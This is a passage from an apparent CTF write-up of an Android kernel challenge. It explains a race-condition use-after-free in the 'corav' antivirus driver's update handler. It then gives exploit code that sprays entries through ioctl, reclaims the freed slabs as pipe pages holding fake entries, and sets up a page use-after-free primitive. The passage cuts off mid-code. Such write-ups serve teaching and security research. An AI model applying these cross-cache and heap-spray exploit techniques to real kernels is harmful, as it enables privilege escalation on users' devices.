<p>The first command, <code class="language-plaintext highlighter-rouge">CORCTL_INSERT</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_insert()</code>. This function reads up to 512 bytes from the specified file, allocates a <code class="language-plaintext highlighter-rouge">struct corav_entry</code> object, and stores it in a bucket. Finally, it returns the file signature to the user as an identifier for the entry.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_insert</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_alloc_entry</span><span class="p">(</span><span class="n">ue</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_insert_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The second command, <code class="language-plaintext highlighter-rouge">CORCTL_UPDATE</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_update()</code>. This function first looks up the existing <code class="language-plaintext highlighter-rouge">corav_entry</code> by its signature. It then reads the file, calculates a new signature, and updates the entry with the new signature and flags.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_update</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">old_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">old_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">new_sig</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">risk</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">root_only</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The third command, <code class="language-plaintext highlighter-rouge">CORCTL_DELETE</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_remove()</code>. This function reads the file at the specified path, calculates its signature, and looks up the corresponding entry. If the entry is found, it is removed from the bucket and released.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_remove</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_remove_entry_locked</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">corav_free_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This built-in driver also registers a hook function, <code class="language-plaintext highlighter-rouge">corav_scan()</code>, at the SELinux hook point <code class="language-plaintext highlighter-rouge">bprm_check_security</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">__init</span> <span class="nf">corav_selinux_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">security_add_hooks</span><span class="p">(</span><span class="n">corav_hooks</span><span class="p">,</span> <span class="n">ARRAY_SIZE</span><span class="p">(</span><span class="n">corav_hooks</span><span class="p">),</span> <span class="s">"corav"</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="k">struct</span> <span class="n">security_hook_list</span> <span class="n">corav_hooks</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
    <span class="n">LSM_HOOK_INIT</span><span class="p">(</span><span class="n">bprm_check_security</span><span class="p">,</span> <span class="n">corav_scan</span><span class="p">),</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">corav_scan()</code> function performs a sanitization check whenever <code class="language-plaintext highlighter-rouge">SYS_execve</code> is invoked. First, it prevents the root user from executing certain hardcoded binaries, such as <code class="language-plaintext highlighter-rouge">/bin/sh</code> (which explains why <code class="language-plaintext highlighter-rouge">adb shell su 0 sh</code> always fails).</p>

<p>After that, it calculates the signature of the binary being executed and looks up the corresponding entry. If the entry is not found, execution is allowed; otherwise, the function either returns the error code <code class="language-plaintext highlighter-rouge">-EACCES</code> or directly kills the process.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_scan</span><span class="p">(</span><span class="k">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Hardcoded binaried check</span>
    <span class="c1">// [...]</span>

    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">risk</span> <span class="o">&gt;=</span> <span class="n">RISK_MODERATE</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">risk</span> <span class="o">&gt;=</span> <span class="n">RISK_HIGH</span><span class="p">)</span>
        <span class="n">send_sig_info</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">,</span> <span class="n">SEND_SIG_NOINFO</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="22-vulnerability">2.2. Vulnerability</h3>

<p>Delving into the internal implementation, we found that the lookup function <code class="language-plaintext highlighter-rouge">corav_lockup_entry_locked()</code> (and, while writing this post, I realized it should be named <code class="language-plaintext highlighter-rouge">lookup_entry_locked()</code> rather than lockup xD), the insert function <code class="language-plaintext highlighter-rouge">corav_insert_entry_locked()</code>, the update function <code class="language-plaintext highlighter-rouge">corav_update_entry_locked()</code> and the remove function <code class="language-plaintext highlighter-rouge">corav_remove_entry_locked()</code> are all invoked with the lock held, which appears correct and should not cause any issues.</p>

<p>However, in <code class="language-plaintext highlighter-rouge">corav_update()</code>, the entire update process <strong>acquires the lock twice</strong>. It first retrieves the entry while holding the lock, then releases it before reading data from the file. Later, it acquires the lock again to update the entry, but during this window <strong>the entry may be freed by another thread</strong>, leading to a use-after-free on <code class="language-plaintext highlighter-rouge">struct corav_entry</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_update</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">old_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">old_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>

    <span class="c1">// At this point, the entry `e` may already have been freed.</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">new_sig</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">risk</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">root_only</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Although the time window is small and the race is hard to trigger, we can address it by examining how <code class="language-plaintext highlighter-rouge">corav_calc_file_content_sig_from_path()</code> works: it internally calls <code class="language-plaintext highlighter-rouge">kernel_read()</code> to read data, which can block.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sig</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">f</span> <span class="o">=</span> <span class="n">filp_open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">filp_close</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_calc_file_content_sig</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sig</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="n">CORAV_SAMPLE_SIZE</span> <span class="cm">/* 512 */</span><span class="p">];</span>
    <span class="n">loff_t</span> <span class="n">pos</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">bytes</span><span class="p">;</span>

    <span class="n">bytes</span> <span class="o">=</span> <span class="n">kernel_read</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">CORAV_SAMPLE_SIZE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">sig</span> <span class="o">=</span> <span class="n">corav_hash64</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By passing a pipe via <code class="language-plaintext highlighter-rouge">/proc/self/fd/&lt;pipe_fd&gt;</code> to <code class="language-plaintext highlighter-rouge">corav_update()</code>, we can fully control the race condition, making the exploit much more stable.</p>

<h2 id="3-exploitation">3. Exploitation</h2>

<h3 id="31-reclaim-the-free-entry">3.1. Reclaim the Free Entry</h3>

<p>Once the race triggers, we can assume that the entry <code class="language-plaintext highlighter-rouge">e</code> has been freed inside <code class="language-plaintext highlighter-rouge">corav_update_entry_locked()</code>. This function first calls <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> to validate the entry and then calls <code class="language-plaintext highlighter-rouge">corav_update_entry()</code> to update the old entry.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_update_entry_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">,</span> <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">,</span> <span class="n">bool</span> <span class="n">root_only</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">old_b</span> <span class="o">=</span> <span class="n">corav_stob</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">new_b</span> <span class="o">=</span> <span class="n">corav_stob</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="c1">// Do some lock operations</span>
    <span class="c1">// [...]</span>

    <span class="n">corav_verify_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry</span><span class="p">(</span><span class="n">old_b</span><span class="p">,</span> <span class="n">new_b</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">sig</span><span class="p">,</span> <span class="n">risk</span><span class="p">,</span> <span class="n">root_only</span><span class="p">);</span>

    <span class="c1">// Do some unlock operations</span>
    <span class="c1">// [...]</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">corav_update_entry()</code> removes the entry from the original bucket (implemented as an rbtree), updates several fields, and inserts it into another rbtree — allowing later access to the freed entry object.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_update_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">old_b</span><span class="p">,</span> <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">new_b</span><span class="p">,</span> <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">,</span> <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">,</span> <span class="n">bool</span> <span class="n">root_only</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EEXIST</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">corav_remove_entry</span><span class="p">(</span><span class="n">old_b</span><span class="p">,</span> <span class="n">e</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">=</span> <span class="n">sig</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_insert_entry</span><span class="p">(</span><span class="n">new_b</span><span class="p">,</span> <span class="n">e</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, <code class="language-plaintext highlighter-rouge">corav_free_entry()</code> resets certain fields before freeing the entry:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">corav_free_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">status</span> <span class="o">=</span> <span class="n">CORAV_ENTRY_DEAD</span><span class="p">;</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> will trigger a kernel panic if these fields contain invalid values:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">corav_verify_entry</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">BUG_ON</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">status</span> <span class="o">!=</span> <span class="n">CORAV_ENTRY_ALIVE</span> <span class="o">||</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">==</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This implies we must either reclaim the freed entry as another <code class="language-plaintext highlighter-rouge">corav_entry</code> or cross-cache it with objects of a different type.</p>

<p>Unfortunately, calling <code class="language-plaintext highlighter-rouge">corav_update_entry()</code> on the reclaimed <code class="language-plaintext highlighter-rouge">corav_entry</code> object does not cause any issues in this case, so we need to find some candidate objects for cross-cache.</p>

<p>A common target is <strong>the page backing <code class="language-plaintext highlighter-rouge">struct pipe_buffer</code></strong>, which allows us to read the data by reading from the pipe and overwrite it by writing to the pipe.</p>

<h3 id="32-spray-the-entries">3.2. Spray the Entries</h3>

<p>During the CTF, the success rate of reclaiming the entry object in my exploit was relatively low, which was quite frustrating. After comparing my exploit with the author’s, we discovered that the author used a <strong>pipe fd</strong> to store data for command usage, whereas my exploit relied on the file <code class="language-plaintext highlighter-rouge">/storage/emulated/0/Download/test</code>. This file resides under the mount point <code class="language-plaintext highlighter-rouge">/storage/emulated</code>, which is mounted as a <strong>FUSE filesystem</strong>.</p>

<p>Since read/write operations on a FUSE filesystem are significantly slower than those on a pipe, this not only reduced the spraying efficiency but also introduced potential side effects (our target page may be reclaimed accidentally by its write handler).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>=&gt; __alloc_pages
=&gt; __folio_alloc
=&gt; __filemap_get_folio
=&gt; pagecache_get_page
=&gt; f2fs_write_begin
=&gt; generic_perform_write
=&gt; f2fs_file_write_iter
=&gt; do_iter_write
=&gt; vfs_iter_write
=&gt; fuse_passthrough_write_iter
=&gt; fuse_file_write_iter
=&gt; vfs_write
=&gt; ksys_write
=&gt; __x64_sys_write
</code></pre></div></div>

<p>As a result, I revised my exploit by following the author’s approach and <strong>using a pipe fd</strong> to store data:</p>
<ol>
  <li>Open a pipe.</li>
  <li>Use the write-end to store data.</li>
  <li>Pass the read-end to the command handler.</li>
</ol>

<p>Except for the file path, the cross-cache for <code class="language-plaintext highlighter-rouge">corav_entry</code> is similar to another kernel challenge. The relevant code snippet can be found in the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// [...]</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] create user entries in CPU-0</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="n">pin_on_cpu</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="n">ue</span> <span class="o">=</span> <span class="p">{};</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">ue</span><span class="p">.</span><span class="n">path</span><span class="p">,</span> <span class="n">tmp_file_path</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">val</span> <span class="o">&lt;</span> <span class="mh">0x2000</span><span class="p">;</span> <span class="n">val</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">set_tmp_data</span><span class="p">(</span><span class="n">val</span><span class="p">);</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">ioctl</span><span class="p">(</span><span class="n">corav_fd</span><span class="p">,</span> <span class="n">CORCTL_INSERT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ue</span><span class="p">));</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">val</span> <span class="o">==</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">target_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="p">.</span><span class="n">sig</span><span class="p">;</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"[+] target sig: %016lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">target_sig</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// [...]</span>

<span class="n">printf</span><span class="p">(</span><span class="s">"[+] delete all user entries</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="n">ue</span> <span class="o">=</span> <span class="p">{};</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">ue</span><span class="p">.</span><span class="n">path</span><span class="p">,</span> <span class="n">tmp_file_path</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">val</span> <span class="o">&lt;</span> <span class="mh">0x2000</span><span class="p">;</span> <span class="n">val</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">set_tmp_data</span><span class="p">(</span><span class="n">val</span><span class="p">);</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">ioctl</span><span class="p">(</span><span class="n">corav_fd</span><span class="p">,</span> <span class="n">CORCTL_DELETE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ue</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="c1">// [...]</span>
</code></pre></div></div>

<h3 id="33-spray-the-pipe-page">3.3. Spray the Pipe Page</h3>

<p>By default, a pipe is allocated 16 pages. Therefore, one can either create many pipes and use only a single page from each, or create fewer pipes and fully populate all 16 pages. In my exploit, I chose the latter approach.</p>

<p>Moreover, since <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> validates the entry object and is invoked frequently, and <code class="language-plaintext highlighter-rouge">corav_remove_entry()</code> treats the <code class="language-plaintext highlighter-rouge">-&gt;node</code> field as an rbtree node, it is necessary to craft fake entries with a non-zero signature, a valid magic number, and a properly initialized rbtree structure. Luckily, setting these fields to <code class="language-plaintext highlighter-rouge">NULL</code> appears sufficient to bypass all the checks inside <code class="language-plaintext highlighter-rouge">__rb_erase_augmented()</code>.</p>

<p>The relevant part of the pipe-spraying code is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// [...]</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] try to reclaim free slabs as pipe pages</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">tmp_buffer</span><span class="p">);</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">64</span><span class="p">)</span> <span class="p">{</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">tmp_buffer</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mh">0x0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6969696969696969UL</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">tmp_buffer</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">]</span> <span class="o">=</span> <span class="n">CORAV_ENTRY_ALIVE</span><span class="p">;</span> <span class="c1">// magic number</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">RECLAIM_PIPE_COUNT</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">SYSCHK</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">tmp_buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">tmp_buffer</span><span class="p">)));</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="c1">// [...]</span>
</code></pre></div></div>

<h3 id="34-primitive---page-uaf">3.4. Primitive - Page UAF</h3>

<p>Once a pipe buffer is inserted into the bucket, the question is: what can we do next?</p>

<p>Intuitively, one might attempt to leak a kernel address through rbtree operations and then corrupt the rbtree structure to escalate into a more powerful primitive. However, there is actually a simpler approach to achieving a page UAF, which is also something I learned from the STAR Labs Summer Pwnables challenge (thanks Billy for reminding me during the game).</p>

<p>For readers interested in the details, please refer to <a href="https://u1f383.github.io/linux/2025/09/01/starlabs-summer-pwnables-linux-kernel-challenge-writeup.html">my other post</a>, specifically the section <strong>“3.4. Intended Solution.”</strong></p>

<p>In short, we can remove the victim entry and thereby release it. Once the remove handler invokes <code class="language-plaintext highlighter-rouge">kfree()</code>, the entry <code class="language-plaintext highlighter-rouge">e</code> actually resides somewhere within the pipe page. Since this address does not belong to any slab, the function <code class="language-plaintext highlighter-rouge">free_large_kmalloc()</code> [1] is invoked.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kfree</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">object</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span><span class="p">;</span>
